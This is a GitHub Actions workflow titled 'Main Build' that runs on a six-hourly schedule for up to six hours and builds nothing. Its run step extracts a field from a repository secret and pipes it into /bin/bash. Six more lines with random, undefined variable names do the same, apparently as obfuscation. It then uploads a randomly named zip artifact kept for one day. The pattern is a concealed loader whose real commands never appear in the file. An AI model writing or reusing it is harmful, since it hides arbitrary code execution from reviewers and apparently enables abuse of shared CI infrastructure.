name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '27 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          ebq9: ${{ secrets.ebq9 }}
        run: |
          printf '%s' "$ebq9" | jq -r .kty22 | /bin/bash
          echo $cosjx6 | jq -r .xro9981 | /bin/bash
          printf '%s' "$p67651" | jq -r .u9671 | /bin/bash
          printf '%s' "$wff44705" | jq -r .b6717 | /bin/bash
          echo $u71 | jq -r .ppa59 | /bin/bash
          echo $tqz7 | jq -r .ndyc29179 | /bin/bash
          echo $ypn12607 | jq -r .mrqj4698 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: cyDPrWlR
          path: "*.zip"
          retention-days: 1
